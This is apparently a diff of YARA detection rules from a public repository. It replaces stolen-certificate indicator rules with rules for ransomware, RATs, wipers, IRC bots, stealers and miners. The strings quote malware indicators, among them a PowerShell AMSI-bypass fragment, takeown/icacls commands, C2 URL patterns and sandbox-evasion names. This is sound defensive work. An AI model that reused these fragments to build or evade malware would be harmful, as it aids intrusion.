 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "be6b5a98d5c218c39d8f10bc2a0e443bc8be8a591ab368ee902de4a45a95c8d2"
+		logic_hash = "064c17427ae6b33ffb09a14abcb924d20ead44250e8bd03070bf40869f1c812e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "cd6aa9a7a4898e42b8361dc3542d0afb72e6deefc0b85ebfb55d282a2982b994"
-		reason = "IcedID"
-		importance = 20
+
+	strings:
+		$s1 = "PPidSpoof" fullword ascii
+		$s2 = "ProcHollowing" fullword ascii
+		$s3 = "CreateProcess" fullword ascii
+		$s4 = "DynamicCodeInject" fullword ascii
+		$s5 = "PPIDDynCodeInject" fullword ascii
+		$s6 = "MapAndStart" fullword ascii
+		$s7 = "PPIDAPCInject" fullword ascii
+		$s8 = "PPIDDLLInject" fullword ascii
+		$s9 = "CopyShellcode" fullword ascii
+		$s10 = "GetEntryFromBuffer" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIC GROUP LIMITED" and pe.signatures [ i ] . serial == "10:1d:6a:5a:29:d9:a7:78:07:55:3c:ea:c6:69:d8:53" )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 5 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4679C5398A279318365Fd77A84445699 : FILE
+rule DITEKSHEN_MALWARE_Win_Bluebot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BlueBot"
 		author = "ditekSHen"
-		id = "ff4061e7-5e45-596f-9d40-c33661a18e71"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8656-L8669"
+		id = "cddd40bb-c3c6-5c44-9cb1-480571375be8"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7306-L7333"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1c591cbb2d35d8dad01ff4ea8c71c8b3a0a5f999f1edfcfc038e47f96d3a3a67"
+		logic_hash = "04a19f649eb2fff7a5bc59ccead80cd0a04c4e5418cbc83e850045dba75b03e0"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "8fcef52c16987307f4e1f7d4b62304c65aedb952c90bb2ead8321f1e1d7c9a6e"
-		reason = "Quakbot"
-		importance = 20
+
+	strings:
+		$x1 = "Blue_Botnet" wide
+		$x2 = "5-START-http" ascii
+		$x3 = "*300-END-" ascii
+		$x4 = "botlogger.php" wide
+		$s1 = "//TARGET//" wide
+		$s2 = "//BLOG//" wide
+		$s3 = "MCBOTALPHA" wide
+		$s4 = "//IPLIST//" wide
+		$s5 = "Host: //BLOG//" wide
+		$s6 = "User-Agent: //USERAGENT//" wide
+		$s7 = "<string>//TARGET//</string>" wide
+		$s8 = "POST //URL// HTTP/1.1/r/n" wide
+		$v1 = "<attack>b__" ascii
+		$v2 = "PressData" fullword ascii
+		$v3 = "POSTPiece" fullword ascii
+		$v4 = /(load|tcp|udp)Stuff/ fullword ascii
+		$v5 = "isAttacking" fullword ascii
+		$v6 = "DoSAttack" fullword ascii
+		$v7 = "prv_attack" fullword ascii
+		$v8 = "blogList" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HURT GROUP HOLDINGS LIMITED" and pe.signatures [ i ] . serial == "46:79:c5:39:8a:27:93:18:36:5f:d7:7a:84:44:56:99" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 5 of ( $s* ) or 5 of ( $v* ) or 9 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_282A8A04073Eced658B9770Bda8C0D28 : FILE
+rule DITEKSHEN_MALWARE_Win_Unkcobaltstrike : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects unknown malware, potentially CobaltStrike related"
 		author = "ditekSHen"
-		id = "d735ccfc-3f5e-5858-95ec-f385172ea8e6"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8671-L8684"
+		id = "24ddccc7-3700-57a1-999c-ddefae6911bb"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7335-L7354"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4cfebe55887a2a09293678e4dff2f93f22bec151dada7c84a41ac6deb10b7cc3"
+		logic_hash = "2fb4e87eec3b56773b812ce6a5c28143183087e0f93d92d76c1103563f8e0891"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5cd4832101eb4f173c43986d5711087c8de25e6fcaef2f333e98a013e29b8373"
-		reason = "RedLineStealer"
-		importance = 20
+
+	strings:
+		$s1 = "https://%hu.%hu.%hu.%hu:%u" ascii wide
+		$s2 = "https://microsoft.com/telemetry/update.exe" ascii wide
+		$s3 = "\\System32\\rundll32.exe" ascii wide
+		$s4 = "api.opennicproject.org" ascii wide
+		$s5 = "%s %s,%s %u" ascii wide
+		$s6 = "User32.d?" ascii wide
+		$s7 = "StrDupA" fullword ascii wide
+		$s8 = "{6d4feed8-18fd-43eb-b5c4-696ad06fac1e}" ascii wide
+		$s9 = "{ac41592a-3d21-46b7-8f21-24de30531656}" ascii wide
+		$s10 = "bd526:3b.4e32.57c8.9g32.35ef41642767~" ascii wide
+		$s11 = { 4b d3 91 49 a1 80 91 42 83 b6 33 28 36 6b 90 97 }
+		$s12 = { 0d 4c e3 5c c9 0d 1f 4c 89 7c da a1 b7 8c ee 7c }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Betamaynd" and pe.signatures [ i ] . serial == "28:2a:8a:04:07:3e:ce:d6:58:b9:77:0b:da:8c:0d:28" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0C48732873Ac8Ccebaf8F0E1E8329Cec : FILE
+rule DITEKSHEN_MALWARE_Win_EXEPWSHDL : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executable downloaders using PowerShell"
 		author = "ditekSHen"
-		id = "dacde33d-3925-52c6-87fd-9f3ead6bfab0"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8686-L8699"
+		id = "1e5a414b-e81e-5915-b00b-75edbfcc32d2"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7356-L7374"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "64c61d1bb48d790a2a3da85c6e57b542f0ee8a85296fc3e8c17ea18d8241790d"
+		logic_hash = "58fbd27758ecd435eb30b7c34f4cf142db8e31edee0838175992923a51706508"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "14ffc96c8cc2ea2d732ed75c3093d20187a4c72d02654ff4520448ba7f8c7df6"
-		reason = "HermeticWiper"
-		importance = 20
+
+	strings:
+		$x1 = "[Ref].Assembly.GetType(" ascii wide
+		$x2 = ".SetValue($null,$true)" ascii wide
+		$s1 = "replace" ascii wide
+		$s2 = "=@(" ascii wide
+		$s3 = "[System.Text.Encoding]::" ascii wide
+		$s4 = ".substring" ascii wide
+		$s5 = "FromBase64String" ascii wide
+		$d1 = "New-Object" ascii wide
+		$d2 = "Microsoft.XMLHTTP" ascii wide
+		$d3 = ".open(" ascii wide
+		$d4 = ".send(" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hermetica Digital Ltd" and pe.signatures [ i ] . serial == "0c:48:73:28:73:ac:8c:ce:ba:f8:f0:e1:e8:32:9c:ec" )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of ( $x* ) and ( 3 of ( $s* ) or all of ( $d* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Da20761Afbb0463C55B1Ea88Bbc7Ec57 : FILE
+rule DITEKSHEN_MALWARE_Win_MB150 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects MB150? Go ransomware"
 		author = "ditekSHen"
-		id = "63e4b8f6-64f1-58a2-920a-e1d4b113380b"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8716-L8729"
+		id = "9688974b-ccf9-59ea-bb31-e46c63f021bf"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7376-L7402"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a4f6bb9742ab40e8003ea14f9645f0c7f885b461fbeb01164b86ddacbda1113f"
+		logic_hash = "a07535fc53912ddde6a0bed187c21ecdb2701d317d7de0cbdd2db37071bc9a21"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f12dd6e77ffab75870b24dd5bfda5a360843f9e5591e764be9f0a2ac59a710d3"
-		reason = "Quakbot"
-		importance = 20
+
+	strings:
+		$x1 = /main\.evade_(clicks_count|cpu_count|disk_size|foreground_window|hostname|mac|printer|screen_size|system_memory|time_acceleration|tmp|utc)/ fullword ascii
+		$x2 = /main\.sandbox_(hostname|mac_addresses)/ fullword ascii
+		$x3 = "main.drop_ransom_note" fullword ascii
+		$x4 = "main.ransom_amount" fullword ascii
+		$x5 = "main.create_encryption_key" fullword ascii
+		$x6 = "main.encrypt" fullword ascii
+		$x7 = "main.encrypt_encryption_key" fullword ascii
+		$x8 = "main.encrypt_file" fullword ascii
+		$x9 = "main.ext_blacklist" fullword ascii
+		$mac1 = "00:03:FF00:05:6900:0C:2900:16:3E00:1C:1400:1C:4200:50:56" ascii nocase
+		$mac2 = "00-03-FF00-05-6900-0C-2900-16-3E00-1C-1400-1C-4200-50-56" ascii nocase
+		$mac3 = "0003FF000569000C2900163E001C14001C42005056" ascii nocase
+		$go = "Go build ID:" ascii
+		$s1 = "main.MB150" ascii
+		$s2 = "http://1.1.1.1" ascii
+		$s3 = "your personnal ID" ascii
+		$s4 = "ransom amount" ascii
+		$s5 = "binance.com" ascii
+		$s6 = "getmonero.org" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CLEVER CLOSE s.r.o." and pe.signatures [ i ] . serial == "da:20:76:1a:fb:b0:46:3c:55:b1:ea:88:bb:c7:ec:57" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $x* ) or ( $go and 4 of ( $s* ) ) or ( 1 of ( $mac* ) and ( 2 of ( $x* ) or 3 of ( $s* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_C51F4Cf4D82Bc920421E1Ad93E39D490 : FILE
+rule DITEKSHEN_MALWARE_Win_Horuseyesrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects HorusEyesRAT"
 		author = "ditekSHen"
-		id = "cbb6cb90-b0f0-5271-81ae-8639c28a5df1"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8731-L8744"
+		id = "80b2fd11-f8b4-5aee-b55a-4f7ee9fad6cf"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7435-L7451"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b9152998eb3c4ba2b6e7571ed03c63ae1ade2f922df6901f8e46b08f41474f7b"
+		logic_hash = "c0f499e3a17923b391ed6b7fa723525a9d4aef0ce04a2c7abec60d5eda15888f"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "d17dc7ef018e13b9a482b60871e25447fb1ae724dfe69b5287dce6b9b78d84a9"
-		reason = "Quakbot"
-		importance = 20
+
+	strings:
+		$x1 = "\\HorusEyesRat-" ascii
+		$x2 = "\\HorusEyesRat.pdb" ascii
+		$x3 = "get_horus_eye" ascii
+		$s1 = "get_Type_Packet" fullword ascii
+		$s2 = "PacketLib" fullword ascii nocase
+		$s3 = "System.Net.Sockets" fullword ascii
+		$s4 = "PROCESS_MODE_BACKGROUND_BEGIN" fullword ascii
+		$s5 = "EXECUTION_STATE" fullword ascii
+		$s6 = /Plugins\\[A-Z]{2}.dll/ fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CUT AHEAD LTD" and pe.signatures [ i ] . serial == "c5:1f:4c:f4:d8:2b:c9:20:42:1e:1a:d9:3e:39:d4:90" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or ( 4 of ( $s* ) and #s6 > 4 ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_69A72F5591Ad78A0825Fbb9402Ab9543 : FILE
+rule DITEKSHEN_MALWARE_Win_Breakwin : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BreakWin Wiper"
 		author = "ditekSHen"
-		id = "a30ca6aa-3bf4-5fa2-8297-7b983410e5d4"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8746-L8759"
+		id = "4ffadbfa-c1cc-59e6-a9ba-7a34eca6c3fe"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7453-L7471"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b2a8c08a612f7352a159a9d3f7d9152d9de043db1ec69e4bb2493533453f8f5c"
+		logic_hash = "86fc89e28fc107c2d4fe98dc16048d9e076b1fef53a3df0814f80a88bbe09c48"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "42a6612f4c652b521435989b5f044403649fef6db4fb476f3c4d981dc2f9bdf8"
-		reason = "Quakbot"
-		importance = 20
+
+	strings:
+		$s1 = "Started wiping file %s with %s." fullword wide
+		$s2 = "C:\\Program Files\\Lock My PC" wide
+		$s3 = "Stardust is still alive." fullword wide
+		$s4 = "Failed to terminate the locker process." fullword wide
+		$s5 = "C:\\Windows\\System32\\cmd.exe" fullword wide
+		$s6 = "Process created successfully. Executed command: %s." fullword wide
+		$s7 = "locker_background_image_path" fullword ascii
+		$s8 = "takeown.exe /F \"C:\\Windows\\Web\\Screen\" /R /A /D Y" fullword ascii
+		$s9 = "icacls.exe \"C:\\Windows\\Web\\Screen\" /reset /T" fullword ascii
+		$s10 = "takeown.exe /F \"C:\\ProgramData\\Microsoft\\Windows\\SystemData\" /R /A /D Y" fullword ascii
+		$s11 = ".?AVProcessSnapshotCreationFailedException@@" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PUSH BANK LIMITED" and pe.signatures [ i ] . serial == "69:a7:2f:55:91:ad:78:a0:82:5f:bb:94:02:ab:95:43" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_8Cece6Df54Cf6Ad63596546D77Ba3581 : FILE
+rule DITEKSHEN_MALWARE_Win_Coinminer03 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects coinmining malware"
 		author = "ditekSHen"
-		id = "c5c19072-5a2f-5851-83bf-25a9e2fd9033"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8761-L8774"
+		id = "e0e57557-7c46-5336-b904-c4c1f142bd81"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7506-L7528"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1980b3ef7df1bfa43d401fdd8393cb8ffb5c919d558c23314ffb9e823cf9590d"
+		logic_hash = "f22e1af955a0d132dda820fe5e5e1ae2f077b7264ce1f0125a2f37c0da6b6508"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1a9ff8aba1b24e3bd06442ac6d593ff224b685cba4edef79e740f569ab453161"
-		reason = "Malware"
-		importance = 20
+
+	strings:
+		$s1 = "UnVzc2lhbiBTdGFuZGFyZCBUaW1l" wide
+		$s2 = "/xmrig" wide
+		$s3 = "/gminer" wide
+		$s4 = "-o {0} -u {1} -p {2} -k --cpu-priority 0 --threads={3}" wide
+		$s5 = "--algo ethash --server" wide
+		$s6 = "--algo kawpow --server" wide
+		$cnc1 = "/delonl.php?hwid=" fullword wide
+		$cnc2 = "/gateonl.php?hwid=" fullword wide
+		$cnc3 = "&cpuname=" fullword wide
+		$cnc4 = "&gpuname=" fullword wide
+		$cnc5 = "{0}/gate.php?hwid={1}&os={2}&cpu={3}&gpu={4}&dateinstall={5}&gpumem={6}" fullword wide
+		$cnc6 = "/del.php?hwid=" fullword wide
+		$f1 = "<StartGpuethGminer>b__" ascii
+		$f2 = "<StartGpuetcGminer>b__" ascii
+		$f3 = "<StartGpurvnGminer>b__" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mikael LLC" and pe.signatures [ i ] . serial == "8c:ec:e6:df:54:cf:6a:d6:35:96:54:6d:77:ba:35:81" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $cnc* ) or ( 2 of ( $f* ) and ( 1 of ( $s* ) or 1 of ( $f* ) ) ) or all of ( $f* ) or 5 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Db95B22362D46A73C39E0Ac924883C5B : FILE
+rule DITEKSHEN_MALWARE_Win_Zeppelin : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Zeppelin (Delphi) ransomware"
 		author = "ditekSHen"
-		id = "df60473d-da8a-59c1-84d1-717d52d2411d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8776-L8789"
+		id = "368d0c31-745d-50ad-a265-50561fdc822a"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7530-L7545"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "29015f6e11f2c93cc12e39cf50a1bda3bd4aa0bb7df0d7374223031361067495"
+		logic_hash = "f6c8420756b562662985dd26eaad58500a24cae786a47b788c953e86276116a1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "751a7e6c4dbe6e7ca633b91515c9f620bff6314ce09969a3af26d18945dc43b5"
-		reason = "Smoke Loader"
-		importance = 20
+
+	strings:
+		$s1 = "TUnlockAndEncrypt" ascii
+		$s2 = "TExcludeFiles" ascii
+		$s3 = "TExcludeFolders" ascii
+		$s4 = "TDrivesAndShares" ascii
+		$s5 = "TTaskKiller" ascii
+		$x1 = "!!! D !!!" ascii
+		$x2 = "!!! LOCALPUBKEY !!!" ascii
+		$x3 = "!!! ENCLOCALPRIVKEY !!!" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPSLTD PLYMOUTH LTD" and pe.signatures [ i ] . serial == "db:95:b2:23:62:d4:6a:73:c3:9e:0a:c9:24:88:3c:5b" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $x* ) or ( 2 of ( $x* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_D3Aee8Abb9948844A3Ac1C04Cc7E6Bdf : FILE
+rule DITEKSHEN_MALWARE_Win_Slackbot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SlackBot"
 		author = "ditekSHen"
-		id = "8b17b23f-3296-55b2-8e7b-40e13a14a610"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8791-L8804"
+		id = "cd540aa2-dc8f-5ccc-b66c-a8d72b73c896"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7547-L7588"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9af0b27e96575298a31b53f6f88cdb20934db75637abdd0acb40bb3c6921542c"
+		logic_hash = "919839883c437b69cf7f380830f2499be24415f96f1e42424e4859114f958581"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "e386450257e170981513b7001a82fb029f0931e5c2f11c6d9b86660da0b89a66"
-		reason = "Quakbot"
-		importance = 20
+
+	strings:
+		$x1 = "lp0o4bot v" ascii
+		$x2 = "slackbot " ascii
+		$s1 = "cpu: %lumhz %s, uptime: %u+%.2u:%.2u, os: %s" fullword ascii
+		$s2 = "%s, running for %u+%.2u:%.2u" fullword ascii
+		$s3 = "PONG :%s" fullword ascii
+		$s4 = "PRIVMSG %s :%s" fullword ascii
+		$s5 = "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" fullword ascii
+		$m1 = "saving %s to %s" ascii
+		$m2 = "visit number %u failed" ascii
+		$m3 = "sending %s packets of %s bytes to %s with a delay of %s" ascii
+		$m4 = "file executed" ascii
+		$m5 = "packets sent" ascii
+		$m6 = "upgrading to %s" ascii
+		$m7 = "rebooting..." ascii
+		$c1 = "!@remove" fullword ascii
+		$c2 = "!@restart" fullword ascii
+		$c3 = "!@reboot" fullword ascii
+		$c4 = "!@rndnick" fullword ascii
+		$c5 = "!@exit" fullword ascii
+		$c6 = "!@sysinfo" fullword ascii
+		$c7 = "!@upgrade" fullword ascii
+		$c8 = "!@login" fullword ascii
+		$c9 = "!@run" fullword ascii
+		$c10 = "!@webdl" fullword ascii
+		$c11 = "!@cycle" fullword ascii
+		$c12 = "!@clone" fullword ascii
+		$c13 = "!@visit" fullword ascii
+		$c14 = "!@udp" fullword ascii
+		$c15 = "!@nick" fullword ascii
+		$c16 = "!@say" fullword ascii
+		$c17 = "!@quit" fullword ascii
+		$c18 = "!@part" fullword ascii
+		$c19 = "!@join" fullword ascii
+		$c20 = "!@raw" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOUSE 9A s.r.o" and pe.signatures [ i ] . serial == "d3:ae:e8:ab:b9:94:88:44:a3:ac:1c:04:cc:7e:6b:df" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or all of ( $s* ) or all of ( $m* ) or ( 10 of ( $c* ) and ( 1 of ( $x* ) or 3 of ( $s* ) or 2 of ( $m* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6000F8C02B0A15B1E53B8399845Faddf : FILE
+rule DITEKSHEN_MALWARE_Win_Sweetystealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SweetyStealer"
 		author = "ditekSHen"
-		id = "6d4224bd-1522-5b0f-b39e-1ba4ec0f1a63"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8806-L8819"
+		id = "21dd1706-2cb5-5b27-ad3a-c3de8e6fb333"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7590-L7608"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a8687b2aa02909af5fc7c706f31c419c4af48225abe7415bf262de57bb85258f"
+		logic_hash = "ecf22240b47af077055260faba0406721f1b4cc5ed04180285df0de86c4e1241"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6f18caa7cd75582d3a311dcc2dadec2ed32e15261c1dc5c9471e213d28367362"
-		reason = "Amadey"
-		importance = 20
+
+	strings:
+		$s1 = "SWEETY STEALER" wide
+		$s2 = "\\SWEETYLOG.zip" fullword wide
+		$s3 = "\\SWEETY STEALER\\SWEETY\\" ascii
+		$s4 = "\\Sweety" fullword wide
+		$s5 = "SWEETYSTEALER." ascii
+		$s6 = "in Virtual Environment, so we prevented stealing" wide
+		$s7 = ":purple_square:" wide
+		$f1 = "<GetDomainDetect>b__" ascii
+		$f2 = "<GetAllProfiles>b__" ascii
+		$f3 = "<ProcessExtraFieldZip64>b__" ascii
+		$f4 = "<PostExtractCommandLine>k__" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAY LIMITED" and pe.signatures [ i ] . serial == "60:00:f8:c0:2b:0a:15:b1:e5:3b:83:99:84:5f:ad:df" )
+		uint16( 0 ) == 0x5a4d and 3 of ( $s* ) or ( 3 of ( $f* ) and 1 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_F6Ad45188E5566Aa317Be23B4B8B2C2F : FILE
+rule DITEKSHEN_MALWARE_Win_Genircbot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects generic IRCBots"
 		author = "ditekSHen"
-		id = "d4afb6ed-1cfd-5c49-8959-0cf136d0e9f0"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8821-L8834"
+		id = "e1faa1dd-bbf5-5208-97d6-a6e8597d39bc"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7610-L7626"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
